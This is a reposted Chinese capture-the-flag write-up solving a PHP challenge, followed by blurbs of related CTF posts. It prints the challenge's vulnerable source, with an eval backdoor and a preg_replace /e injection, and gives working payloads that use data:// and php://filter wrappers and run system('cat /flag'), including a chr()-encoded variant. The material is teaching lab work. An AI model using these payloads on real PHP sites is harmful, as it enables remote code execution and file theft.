BUU [BJDCTF2020]ZJCTF，不过如此

7月前作者：J_a_y_1_7 分类：Toy博客阅读(24) 违法举报

这篇具有很好参考价值的文章主要介绍了BUU [BJDCTF2020]ZJCTF，不过如此。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

BUU [BJDCTF2020]ZJCTF，不过如此

和BUU [ZJCTF 2019]NiZhuanSiWei一样。

?text=data://text/plain,I have a dream
&file=php://filter/read=convert.base64-encode/resource=next.php

得到next.php源码。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

最终目的是调用getFlag（）然后命令执行。

get和session两个值一样的，名字为id的变量，没什么用，估计是用来混淆不知道的那些人。

preg_replace()的/e模式存在命令执行漏洞。

深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

最终payload：文章来源地址https://www.toymoban.com/news/detail-535637.html

?text=data://text/plain,I have a dream&file=next.php&
+
\S*=${getFlag()}&cmd=system('cat /flag');
\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}
//chr拼接system的参数
\S*=${phpinfo()}可查看phpinfo()

到了这里，关于BUU [BJDCTF2020]ZJCTF，不过如此的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

【CTF-web】变量1（php全局变量）

题目链接：https://ctf.bugku.com/challenges/detail/id/76.html 注意到$$args，那么我们可以通过args输入一个已定义变量的名称来得到它的值，于是查询php的九大全局变量，如下表所示。变量作用 $_POST 广泛用于收集提交 method=“post” 的 HTML 表单后的表单数据。$_POST 也常用于传递变量。

2024年02月12日
浏览(34)
安全 ctf-Web基础_cookie欺骗

题目描述 Cookie ： Cookie欺骗、认证、伪造解题思路： 1. 打开题目给的链接，显示：hello guest. only admin can get flag. 2. 使用F12快捷键进入开发者工具，选择控制台，修改管理员 admin 的 Cookie 值为 1(True)： document.cookie #查看cookie document.cookie = \\\'admin = 1\\\' #将admin的值修

2024年04月28日
浏览(31)
【PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0

第一次遇见整数溢出的题目，值得记录一下（虽然这里的整数溢出很简单目录前言一、整数溢出二、解题思路 1.ELF/checksec查看保护 2.IDA反汇编 3.整数溢出 4.exp编写总结整数溢出漏洞——对于有/无符号数，长/短位宽转换时机器码的变换策略所指。如果一个整数用来计算

2024年02月06日
浏览(35)
青少年CTF-Web-帝国CMS1-3通关记录

本次进通过平台内题目进行，非真实环境。首先下发题目链接我们首先先找后台看看后台地址为 /e/admin/ 随后，经过dirsearch进行扫描，得到了一个www.zip 访问扫描到的www.zip，得到网站源码使用D盾扫描，得到eval后门。蚁剑链接得到根目录的Flag 这道题目和CMS01差不多，但是

2024年02月03日
浏览(38)
【CTF-web】备份是个好习惯（查找备份文件、双写绕过、md5加密绕过）

题目链接：https://ctf.bugku.com/challenges/detail/id/83.html 经过扫描可以找到index.php.bak备份文件，下载下来后打开发现是index.php的原代码，如下图所示。由代码可知我们要绕过md5加密，两数如果满足科学计数法的形式的话，php会将其当作科学计数法所得的数字来进行比较，根据该原

2024年02月12日
浏览(28)
[ZJCTF 2019]NiZhuanSiWei

目录信息收集代码审计第一层第二层第三层打开页面又是代码审计代码如下第一层通过data伪协议模拟打开text文件 ?text=data://text/plain,welcome to the zjctf 第二层通过filter伪协议读取useless.php file=php://filter/convert.base64-encode/resource=useless.php 进行base64解码后得到useless.php的内容

2023年04月17日
浏览(22)
[ZJCTF 2019]NiZhuanSiWei 1

1.1打开题目地址，查看为PHP代码审计代码审计走起，一步一步分析 2.1大体要传入三个参数，先看第一段语句，知识点 1）PHP函数 1.isset：PHP: isset - Manual 2.file_get_contents：PHP: file_get_contents - Manual 2）关于伪协议常用的payload，包括读文件和php代码执行 1.?file=data:text/plain,?p

2024年02月08日
浏览(35)
BUU [vnctf2023]电子木鱼

先看看题目，点不了。看看源码。Rust整数溢出。在 Rust 中，整数类型默认是有符号整数类型，意味着这些整数类型可以表示正数和负数。对于有符号整数类型，最高位用来表示符号，0 表示正数，1 表示负数。当一个正数进行整数溢出时，也就是它的值超过了它的类型所能

2024年02月12日
浏览(25)
[ZJCTF 2019]NiZhuanSiWei 1详解

知识点： data:// 写入数据 php://input 执行php //filter 查看源码下面我们来看题吧，打开题目一看，直接是源码我们需要get方式提交参数，text、file、password。然后就是来到了第一个需要绕过的地方要求text不为空，这是肯定的，主要看下一句，file_get_contents($text,\\\'r\\\')===\\\"welcome to

2024年02月08日
浏览(30)
buu [AFCTF2018]花开藏宝地 1

题目描述：题面：题目分析：五个压缩包，分别是：纯数字爆破，小字母爆破，大写字母爆破，伪密码，NTFS隐写（cool！大小写有提示呢，没有也不要紧，那就大小写都爆破）爆破结果：19260817，alice, AVADA 分析第四个伪加密相关资料：（简单点说即以下绿框部分为奇数时

2024年02月03日
浏览(29)